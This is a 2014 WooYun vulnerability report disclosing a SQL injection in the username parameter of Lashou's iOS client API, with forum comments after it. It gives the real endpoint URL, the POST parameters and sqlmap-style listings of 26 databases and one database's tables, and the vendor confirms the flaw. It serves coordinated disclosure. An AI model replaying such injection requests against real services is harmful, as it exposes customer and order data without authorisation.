当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051462

漏洞标题:拉手网IOS客户端SQL注入一枚多库

相关厂商:拉手网

漏洞作者: niliu

提交时间:2014-02-19 23:20

修复时间:2014-04-05 23:20

公开时间:2014-04-05 23:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-19: 细节已通知厂商并且等待厂商处理中
2014-02-20: 厂商已经确认,细节仅向厂商公开
2014-03-02: 细节向核心白帽子及相关领域专家公开
2014-03-12: 细节向普通白帽子公开
2014-03-22: 细节向实习白帽子公开
2014-04-05: 细节向公众公开

简要描述:

POST SQL注入一枚多库 大量敏感信息

详细说明:

URL:

http://go.client.lashou.com:80/index.php/Seven/mylist/cancel_order/STID/groupbuy_4.82_ipad_10000_c9ea79576bf848d860b1a9820e286df4fd483e88_43746679_2419_iPad4,1_7.0.4_43D1A5CC-C1A4-4EAA-A833-E376C5849BAD_c9ea79576bf848d860b1a9820e286df4fd483e88
POST:
password=5416d7***855e84&username=niliu&time=1392819709&sign=84badb52147fcf003d33e5a939e9&trade_no=793411522a66e2519


username参数过滤不严存在注入

1.png


26个数据库

2.png


available databases [26]:
[*] `EN
[*] `hotel
[*] `lashoblog`
[*] `lashou_sem`
[*] `lashou_ssb
[*] `lgolR`
[*] `nyqrlB:`
[*] `odntqm`
[*] `smgu:C#
[*] `tgonUW
[*] `tipt
[*] adbrgss
[*] dataminihg
[*] dating
[*] game_togk
[*] house
[*] hui
[*] information_schema
[*] lashou_acriviry
[*] lashou_dianping
[*] lashou_hlpel
[*] lashou_huk
[*] lashou_jd
[*] lashou_mall
[*] lodpo
[*] mylpp


Database: lashou_mall
[23 tables]
+-----------------------------+
| mall_activity_category |
| mall_brand |
| mall_brand_category |
| mall_brand_category_2 |
| mall_brand_goods |
| mall_brand_merchant |
| mall_brand_promotion |
| mall_brand_tuangou_cat |
| mall_category |
| mall_category_goods |
| mall_category_goods_2 |
| mall_category_merchant |
| mall_category_merchant_2 |
| mall_index_category_brand |
| mall_index_category_brand_2 |
| mall_index_goods |
| mall_index_publish |
| mall_online_cat |
| online_index_log |
| tuangou_mall_shop |
| tuangou_mall_sp_cat |
| up_goods_online |
| up_sgoods_online |
+-----------------------------+


漏洞证明:

3.png


一号店,京东,淘宝等各种订单数据

4.png

修复方案:

#过滤相关参数
#求20rank!

版权声明:转载请注明来源 niliu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-02-20 09:42

厂商回复:

已经告知开发,紧急处理,感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2014-02-19 23:50 | diguoji ( 普通白帽子 | Rank:323 漏洞数:79 | 中国吉林长春)

    关注下

  2. 2014-02-19 23:50 | diguoji ( 普通白帽子 | Rank:323 漏洞数:79 | 中国吉林长春)

    关注下

  3. 2014-02-20 10:12 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    知道了

  4. 2014-02-20 10:25 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    厂商发送礼物是点错了.............

  5. 2014-02-23 22:17 | 拉手网(乌云厂商)

    @niliu 你手机号多少,有个自助餐券,两人券发给你,或者你送别人。

  6. 2014-02-23 22:35 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @niliu @拉手网 我去,niniu发那么多,才一个两人自主餐券:(

  7. 2014-02-24 12:41 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @拉手网 已经私信你了。谢了.

  8. 2014-02-24 12:42 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @niliu 要是用不掉或者不方便使用的话我可以代劳幺

  9. 2014-02-24 12:43 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @带馅儿馒头 :( 哎,之前说点错了很伤心。。。

  10. 2014-02-24 12:43 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @zzR 哈哈,还没收到呢

  11. 2014-02-24 18:28 | 拉手网(乌云厂商)

    发了两个自助餐券,感谢各位关注,我的QQ:417434548

  12. 2014-02-24 18:35 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @拉手网 拉手的童鞋,不给我来个餐券~~:(

  13. 2014-02-24 18:46 | 拉手网(乌云厂商)

    -_-||| 这个纯属自费,下次,下次我让我们的开发童鞋花钱,我只是运维。

  14. 2014-02-24 19:49 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @拉手网 加你Q了,短信已收到 :)

  15. 2014-04-06 00:14 | 木马游民 ( 路人 | Rank:17 漏洞数:8 | I love LSD!)

    打下小广告:我想看一个洞,WB不够了。想1:1花RMB购买50个。有出售意向的联系我QQ1661384346